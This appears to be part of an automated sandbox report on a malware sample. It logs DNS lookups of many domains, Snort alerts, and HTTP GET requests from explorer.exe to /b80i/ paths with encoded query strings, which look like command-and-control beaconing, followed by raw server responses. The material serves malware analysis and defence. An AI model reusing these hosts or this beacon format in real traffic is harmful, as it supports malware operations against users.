                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              01/28/22-10:47:39.147652TCP1201ATTACK-RESPONSES 403 Forbidden804980534.102.136.180192.168.2.7
                                              01/28/22-10:48:06.427875TCP1201ATTACK-RESPONSES 403 Forbidden804984334.102.136.180192.168.2.7
                                              01/28/22-10:48:32.236240TCP1201ATTACK-RESPONSES 403 Forbidden804984735.186.238.101192.168.2.7

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 28, 2022 10:47:38.887885094 CET4980580192.168.2.734.102.136.180
                                              Jan 28, 2022 10:47:38.906588078 CET804980534.102.136.180192.168.2.7
                                              Jan 28, 2022 10:47:38.906719923 CET4980580192.168.2.734.102.136.180
                                              Jan 28, 2022 10:47:38.906887054 CET4980580192.168.2.734.102.136.180
                                              Jan 28, 2022 10:47:38.925517082 CET804980534.102.136.180192.168.2.7
                                              Jan 28, 2022 10:47:39.147651911 CET804980534.102.136.180192.168.2.7
                                              Jan 28, 2022 10:47:39.147681952 CET804980534.102.136.180192.168.2.7
                                              Jan 28, 2022 10:47:39.147849083 CET4980580192.168.2.734.102.136.180
                                              Jan 28, 2022 10:47:39.147918940 CET4980580192.168.2.734.102.136.180
                                              Jan 28, 2022 10:47:39.167936087 CET804980534.102.136.180192.168.2.7
                                              Jan 28, 2022 10:47:44.213960886 CET4981580192.168.2.7148.72.244.75
                                              Jan 28, 2022 10:47:44.496222973 CET8049815148.72.244.75192.168.2.7
                                              Jan 28, 2022 10:47:44.496540070 CET4981580192.168.2.7148.72.244.75
                                              Jan 28, 2022 10:47:44.496579885 CET4981580192.168.2.7148.72.244.75
                                              Jan 28, 2022 10:47:44.773350000 CET8049815148.72.244.75192.168.2.7
                                              Jan 28, 2022 10:47:44.877895117 CET8049815148.72.244.75192.168.2.7
                                              Jan 28, 2022 10:47:44.878005028 CET8049815148.72.244.75192.168.2.7
                                              Jan 28, 2022 10:47:44.878119946 CET4981580192.168.2.7148.72.244.75
                                              Jan 28, 2022 10:47:44.878442049 CET8049815148.72.244.75192.168.2.7
                                              Jan 28, 2022 10:47:44.879188061 CET8049815148.72.244.75192.168.2.7
                                              Jan 28, 2022 10:47:44.879266977 CET4981580192.168.2.7148.72.244.75
                                              Jan 28, 2022 10:47:44.986690044 CET4981580192.168.2.7148.72.244.75
                                              Jan 28, 2022 10:47:44.994749069 CET8049815148.72.244.75192.168.2.7
                                              Jan 28, 2022 10:47:44.994793892 CET8049815148.72.244.75192.168.2.7
                                              Jan 28, 2022 10:47:44.994906902 CET4981580192.168.2.7148.72.244.75
                                              Jan 28, 2022 10:47:44.995917082 CET8049815148.72.244.75192.168.2.7
                                              Jan 28, 2022 10:47:44.995954037 CET8049815148.72.244.75192.168.2.7
                                              Jan 28, 2022 10:47:44.996098042 CET4981580192.168.2.7148.72.244.75
                                              Jan 28, 2022 10:47:44.996119976 CET4981580192.168.2.7148.72.244.75
                                              Jan 28, 2022 10:47:45.140021086 CET8049815148.72.244.75192.168.2.7
                                              Jan 28, 2022 10:47:45.140058994 CET8049815148.72.244.75192.168.2.7
                                              Jan 28, 2022 10:47:45.140117884 CET4981580192.168.2.7148.72.244.75
                                              Jan 28, 2022 10:47:45.140158892 CET4981580192.168.2.7148.72.244.75
                                              Jan 28, 2022 10:47:45.279189110 CET8049815148.72.244.75192.168.2.7
                                              Jan 28, 2022 10:47:45.279328108 CET4981580192.168.2.7148.72.244.75
                                              Jan 28, 2022 10:47:50.193769932 CET4982080192.168.2.7156.246.248.162
                                              Jan 28, 2022 10:47:50.376739025 CET8049820156.246.248.162192.168.2.7
                                              Jan 28, 2022 10:47:50.377485037 CET4982080192.168.2.7156.246.248.162
                                              Jan 28, 2022 10:47:50.377623081 CET4982080192.168.2.7156.246.248.162
                                              Jan 28, 2022 10:47:50.624048948 CET8049820156.246.248.162192.168.2.7
                                              Jan 28, 2022 10:47:50.624069929 CET8049820156.246.248.162192.168.2.7
                                              Jan 28, 2022 10:47:50.626971006 CET4982080192.168.2.7156.246.248.162
                                              Jan 28, 2022 10:47:50.627028942 CET4982080192.168.2.7156.246.248.162
                                              Jan 28, 2022 10:47:50.810301065 CET8049820156.246.248.162192.168.2.7
                                              Jan 28, 2022 10:48:06.293247938 CET4984380192.168.2.734.102.136.180
                                              Jan 28, 2022 10:48:06.311955929 CET804984334.102.136.180192.168.2.7
                                              Jan 28, 2022 10:48:06.312073946 CET4984380192.168.2.734.102.136.180
                                              Jan 28, 2022 10:48:06.312361002 CET4984380192.168.2.734.102.136.180
                                              Jan 28, 2022 10:48:06.330950975 CET804984334.102.136.180192.168.2.7
                                              Jan 28, 2022 10:48:06.427875042 CET804984334.102.136.180192.168.2.7
                                              Jan 28, 2022 10:48:06.427902937 CET804984334.102.136.180192.168.2.7
                                              Jan 28, 2022 10:48:06.428383112 CET4984380192.168.2.734.102.136.180
                                              Jan 28, 2022 10:48:06.428402901 CET4984380192.168.2.734.102.136.180
                                              Jan 28, 2022 10:48:06.447251081 CET804984334.102.136.180192.168.2.7

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 28, 2022 10:47:28.771871090 CET6456953192.168.2.78.8.8.8
                                              Jan 28, 2022 10:47:28.811583042 CET53645698.8.8.8192.168.2.7
                                              Jan 28, 2022 10:47:38.849167109 CET5973053192.168.2.78.8.8.8
                                              Jan 28, 2022 10:47:38.883527040 CET53597308.8.8.8192.168.2.7
                                              Jan 28, 2022 10:47:44.179296970 CET5931053192.168.2.78.8.8.8
                                              Jan 28, 2022 10:47:44.212059021 CET53593108.8.8.8192.168.2.7
                                              Jan 28, 2022 10:47:50.009982109 CET6429653192.168.2.78.8.8.8
                                              Jan 28, 2022 10:47:50.192629099 CET53642968.8.8.8192.168.2.7
                                              Jan 28, 2022 10:48:06.270339012 CET5668053192.168.2.78.8.8.8
                                              Jan 28, 2022 10:48:06.291172981 CET53566808.8.8.8192.168.2.7
                                              Jan 28, 2022 10:48:11.441534042 CET5882053192.168.2.78.8.8.8
                                              Jan 28, 2022 10:48:11.480706930 CET53588208.8.8.8192.168.2.7
                                              Jan 28, 2022 10:48:16.489336014 CET6098353192.168.2.78.8.8.8
                                              Jan 28, 2022 10:48:16.531825066 CET53609838.8.8.8192.168.2.7
                                              Jan 28, 2022 10:48:21.614301920 CET5228653192.168.2.78.8.8.8
                                              Jan 28, 2022 10:48:21.957580090 CET53522868.8.8.8192.168.2.7
                                              Jan 28, 2022 10:48:26.972152948 CET5606453192.168.2.78.8.8.8
                                              Jan 28, 2022 10:48:26.993797064 CET53560648.8.8.8192.168.2.7
                                              Jan 28, 2022 10:48:32.076863050 CET6374453192.168.2.78.8.8.8
                                              Jan 28, 2022 10:48:32.101113081 CET53637448.8.8.8192.168.2.7
                                              Jan 28, 2022 10:48:37.247196913 CET6145753192.168.2.78.8.8.8
                                              Jan 28, 2022 10:48:37.562048912 CET53614578.8.8.8192.168.2.7

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Jan 28, 2022 10:47:28.771871090 CET192.168.2.78.8.8.80x82b2Standard query (0)www.inslidr.comA (IP address)IN (0x0001)
                                              Jan 28, 2022 10:47:38.849167109 CET192.168.2.78.8.8.80x7c9dStandard query (0)www.carriewilliamsinc.comA (IP address)IN (0x0001)
                                              Jan 28, 2022 10:47:44.179296970 CET192.168.2.78.8.8.80xaae2Standard query (0)www.gooooooo.xyzA (IP address)IN (0x0001)
                                              Jan 28, 2022 10:47:50.009982109 CET192.168.2.78.8.8.80x99dfStandard query (0)www.yixuan5.comA (IP address)IN (0x0001)
                                              Jan 28, 2022 10:48:06.270339012 CET192.168.2.78.8.8.80xb609Standard query (0)www.farmacymerchants.comA (IP address)IN (0x0001)
                                              Jan 28, 2022 10:48:11.441534042 CET192.168.2.78.8.8.80xb621Standard query (0)www.ehaszthecarpetbagger.comA (IP address)IN (0x0001)
                                              Jan 28, 2022 10:48:16.489336014 CET192.168.2.78.8.8.80x678cStandard query (0)www.freelance-rse.comA (IP address)IN (0x0001)
                                              Jan 28, 2022 10:48:21.614301920 CET192.168.2.78.8.8.80xad15Standard query (0)www.nbjcgl.comA (IP address)IN (0x0001)
                                              Jan 28, 2022 10:48:26.972152948 CET192.168.2.78.8.8.80x16e9Standard query (0)www.wildberryhair.comA (IP address)IN (0x0001)
                                              Jan 28, 2022 10:48:32.076863050 CET192.168.2.78.8.8.80xea1Standard query (0)www.micorgas.comA (IP address)IN (0x0001)
                                              Jan 28, 2022 10:48:37.247196913 CET192.168.2.78.8.8.80xa237Standard query (0)www.postmoon.xyzA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Jan 28, 2022 10:47:28.811583042 CET8.8.8.8192.168.2.70x82b2Name error (3)www.inslidr.comnonenoneA (IP address)IN (0x0001)
                                              Jan 28, 2022 10:47:38.883527040 CET8.8.8.8192.168.2.70x7c9dNo error (0)www.carriewilliamsinc.comcarriewilliamsinc.comCNAME (Canonical name)IN (0x0001)
                                              Jan 28, 2022 10:47:38.883527040 CET8.8.8.8192.168.2.70x7c9dNo error (0)carriewilliamsinc.com34.102.136.180A (IP address)IN (0x0001)
                                              Jan 28, 2022 10:47:44.212059021 CET8.8.8.8192.168.2.70xaae2No error (0)www.gooooooo.xyzgooooooo.xyzCNAME (Canonical name)IN (0x0001)
                                              Jan 28, 2022 10:47:44.212059021 CET8.8.8.8192.168.2.70xaae2No error (0)gooooooo.xyz148.72.244.75A (IP address)IN (0x0001)
                                              Jan 28, 2022 10:47:50.192629099 CET8.8.8.8192.168.2.70x99dfNo error (0)www.yixuan5.com156.246.248.162A (IP address)IN (0x0001)
                                              Jan 28, 2022 10:48:06.291172981 CET8.8.8.8192.168.2.70xb609No error (0)www.farmacymerchants.comfarmacymerchants.comCNAME (Canonical name)IN (0x0001)
                                              Jan 28, 2022 10:48:06.291172981 CET8.8.8.8192.168.2.70xb609No error (0)farmacymerchants.com34.102.136.180A (IP address)IN (0x0001)
                                              Jan 28, 2022 10:48:11.480706930 CET8.8.8.8192.168.2.70xb621Name error (3)www.ehaszthecarpetbagger.comnonenoneA (IP address)IN (0x0001)
                                              Jan 28, 2022 10:48:16.531825066 CET8.8.8.8192.168.2.70x678cNo error (0)www.freelance-rse.comfreelance-rse.comCNAME (Canonical name)IN (0x0001)
                                              Jan 28, 2022 10:48:16.531825066 CET8.8.8.8192.168.2.70x678cNo error (0)freelance-rse.com193.141.3.66A (IP address)IN (0x0001)
                                              Jan 28, 2022 10:48:21.957580090 CET8.8.8.8192.168.2.70xad15Name error (3)www.nbjcgl.comnonenoneA (IP address)IN (0x0001)
                                              Jan 28, 2022 10:48:26.993797064 CET8.8.8.8192.168.2.70x16e9No error (0)www.wildberryhair.com172.67.168.28A (IP address)IN (0x0001)
                                              Jan 28, 2022 10:48:26.993797064 CET8.8.8.8192.168.2.70x16e9No error (0)www.wildberryhair.com104.21.46.57A (IP address)IN (0x0001)
                                              Jan 28, 2022 10:48:32.101113081 CET8.8.8.8192.168.2.70xea1No error (0)www.micorgas.com35.186.238.101A (IP address)IN (0x0001)
                                              Jan 28, 2022 10:48:37.562048912 CET8.8.8.8192.168.2.70xa237Name error (3)www.postmoon.xyznonenoneA (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.carriewilliamsinc.com
                                              • www.gooooooo.xyz
                                              • www.yixuan5.com
                                              • www.farmacymerchants.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.74980534.102.136.18080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 28, 2022 10:47:38.906887054 CET17399OUTGET /b80i/?Tjox=OPDrsYDAXYudYL2hPtHgnQqdl9DF73S6Onzi++lTY4BHymNtl4pPvZlk8Nnjb/pYfVanIAZSdg==&3f9LV=d484gh1H9 HTTP/1.1
                                              Host: www.carriewilliamsinc.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 28, 2022 10:47:39.147651911 CET17401INHTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Fri, 28 Jan 2022 09:47:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "61f281b6-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.749815148.72.244.7580C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 28, 2022 10:47:44.496579885 CET17928OUTGET /b80i/?Tjox=RiUiRE3mjXVt2J/JNN+P+o7W4g2/FA7pScYCkHZZbsn0kCc2XYGtZAPMcbBY0+c70SCl18kAyQ==&3f9LV=d484gh1H9 HTTP/1.1
                                              Host: www.gooooooo.xyz
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 28, 2022 10:47:44.877895117 CET17930INHTTP/1.1 404 Not Found
                                              Date: Fri, 28 Jan 2022 09:47:44 GMT
                                              Server: Apache
                                              Accept-Ranges: bytes
                                              Cache-Control: no-cache, no-store, must-revalidate
                                              Pragma: no-cache
                                              Expires: 0
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html
                                              Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b
                                              Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.749820156.246.248.16280C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 28, 2022 10:47:50.377623081 CET17956OUTGET /b80i/?Tjox=uE8pNRih73IMph6TwINJhREQoM0gDuEUez/fX+GpYn7iSRYOEOY8W/QDgsCvwRU23ef9loG+cg==&3f9LV=d484gh1H9 HTTP/1.1
                                              Host: www.yixuan5.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 28, 2022 10:47:50.624048948 CET17957INHTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              Server: Microsoft-IIS/7.5
                                              X-Powered-By: ASP.NET
                                              Date: Fri, 28 Jan 2022 09:47:47 GMT
                                              Connection: close
                                              Content-Length: 1163
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be b3 fd a3 ac d2 d1 b8 fc b8 c4 c3 fb b3 c6 bb f2 d5 df d4 dd ca b1 b2 bb bf c9 d3 c3 a1 a3 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></htm


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3192.168.2.74984334.102.136.18080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 28, 2022 10:48:06.312361002 CET18010OUTGET /b80i/?Tjox=shkkGZu5/RZ8iX9p+IXF0YMrmhwzQE3Vmi1yYN92EzxfMV+N5Q/+I95GtZw5bZfv7GwSNh0c2Q==&3f9LV=d484gh1H9 HTTP/1.1
                                              Host: www.farmacymerchants.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 28, 2022 10:48:06.427875042 CET18011INHTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Fri, 28 Jan 2022 09:48:06 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "61f22041-113"
                                              Via: 1.1 google
                                              Connection: close
